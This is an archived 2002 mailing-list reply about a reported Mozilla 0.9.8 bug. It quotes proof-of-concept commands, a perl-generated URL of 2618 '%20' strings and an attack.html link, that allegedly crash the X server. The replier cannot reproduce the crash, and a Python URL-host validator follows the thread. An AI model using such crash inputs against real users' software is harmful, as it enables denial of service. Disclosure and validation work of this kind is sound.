Re: Ximian Mozilla: The 2618 Bug

From: NyQuist (NyQuistat_private)
Date: Sun Feb 17 2002 - 17:00:56 PST


    On Sun, 2002-02-17 at 17:48, NyQuist wrote:
    > On Sun, 2002-02-17 at 16:24, Replugge [Rod] wrote:
    > > NOTE TO THE MODERATOR: This was sent yesterday but i guess didn't
    > > make it since this doesn't seem to affect a redhat itself, it affects
    > > the mozilla packages distributed by Ximian:
    > > 
    > > The test system looks like:
    > > 
    > > bash#~ rpm -qa | grep mozilla
    > > mozilla-0.9.8-1.ximian.2
    > > mozilla-mail-0.9.8-1.ximian.2
    > > mozilla-xmlterm-0.9.8-1.ximian.2
    > > mozilla-devel-0.9.8-1.ximian.2
    > > nautilus-mozilla-1.0.6-ximian.4
    > > mozilla-psm-0.9.8-1.ximian.2
    > > kdebindings-kmozilla-2.1.1-1
    > > 
    > > This was tested in both RH7.1 and 7.2 with Ximian Gnome (with all
    > > the updates).
    > > 
    > > 
    > > There is a bug in mozilla 0.9.8-1 which allows you
    > > to crash the X server.
    > > 
    > > I won't go into details I'll just show the proof
    > > of concept.
    > > 
    > > 
    > > exploit:
    > > 
    > > Local:
    > > bash#~ mozilla `perl -e "print '%20' x 2618"`
    > > 
    > > 
    > > Remote:
    > > I haven't tested this but I guess:
    > > 
    > > echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >>
    > > ./attack.html
    > > 
    > > perhaps using "img src" or java script...
    > > 
    > > 
    > > Best Regards
    > > 
    > > -- 
    > > /* 
    > > Rodrigo Gutierrez                   <rodrigoat_private>
    > > Trustix AS                         http://www.trustix.com 
    > > */
    > > 
    > On one box: rpm -qa | grep mozilla
    > mozilla-chat-0.9.7-1
    > mozilla-mail-0.9.7-1
    > nautilus-mozilla-1.0.6-ximian.6
    > mozilla-0.9.7-1
    > mozilla-devel-0.9.7-1
    > mozilla-js-debugger-0.9.7-1
    > mozilla-psm-0.9.7-1
    > mozilla-dom-inspector-0.9.7-1
    > 
    > Results in "www.perl -e "print %20 x 2618".com could not be found (lol)
    > perl -e "print '%20' x 2618" prints %20 (2618 times) and doesn't
    > overflow perl.
    > 
    > On the other box: rpm -qa | grep mozilla
    > nautilus-mozilla-1.0.6-ximian.6
    > mozilla-psm-0.9.8-2
    > mozilla-0.9.8-2
    > mozilla-devel-0.9.8-2
    > 
    > Results in same 'not found' error.
    > 
    > The attack.html (as per your script) results in "www.'perl not found".
    > So if it does crash your X, it wasn't present in 0.9.7-1 and is fixed in
    > 0.9.8-2.
    >
    Oops, did miss the `' thing :)
    But even with the right switch `perl -e "print '%20' x 2618"` just brings
    up an empty error box with mozilla-0.9.8-2. Galeon actually shows the
    url (%20 2618 times), and I've tried x 5000 just to see if it overflows.
    > -- 
    > NyQuist | Matthew Hall -- NyQuist at ntlworld dot com 
    > Sig: Microsoft sells you Windows. Linux gives you the whole house.
    > 
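The thread's test string is a URL whose entire host is 2618 copies of `%20`, which no resolver could ever accept. As an added example (not code from the thread or from Mozilla), here is a small Python check a wrapper or URL handler could run before passing an argument to a browser: it parses the URL, applies the DNS length and label rules, and flags a host made of percent-encoded whitespace. The `check_url` function and `POC_URL` constant are names chosen for this example.

```python
import re
from urllib.parse import urlsplit, unquote

MAX_HOST_LEN = 253   # longest DNS name allowed by RFC 1035
# One DNS label: 1-63 chars of letters, digits and hyphens, no leading/trailing hyphen.
LABEL_RE = re.compile(r'^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$')

# Constructed to match the thread's test string (2618 percent-encoded spaces).
POC_URL = 'http://' + '%20' * 2618


def check_url(url):
    """Return a list of reasons the host part of `url` is not a sane DNS name.

    An empty list means the host looks well-formed. A bare argument with no
    scheme is treated as a host, which is what the browser in the thread did.
    """
    problems = []
    if '://' not in url:
        url = 'http://' + url
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return ['unparseable URL: %s' % exc]

    host = parts.hostname or ''          # userinfo and port already stripped
    if not host:
        return ['empty host']

    if len(host) > MAX_HOST_LEN:
        problems.append('host is %d chars, DNS allows at most %d'
                        % (len(host), MAX_HOST_LEN))

    if '%' in host:
        decoded = unquote(host)
        # A host that decodes to nothing but whitespace is the thread's case.
        if not decoded.strip():
            problems.append('host is percent-encoded whitespace')
        else:
            problems.append('host contains percent-encoding')

    for label in host.split('.'):
        if not LABEL_RE.match(label):
            problems.append('bad DNS label %r' % label[:16])
            break
    return problems


if __name__ == '__main__':
    for u in ('http://www.example.com/index.html', 'example.org', POC_URL):
        print(u[:40], '->', check_url(u) or 'ok')
```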

    This archive was generated by hypermail 2b30 : Sun Feb 17 2002 - 20:42:45 PST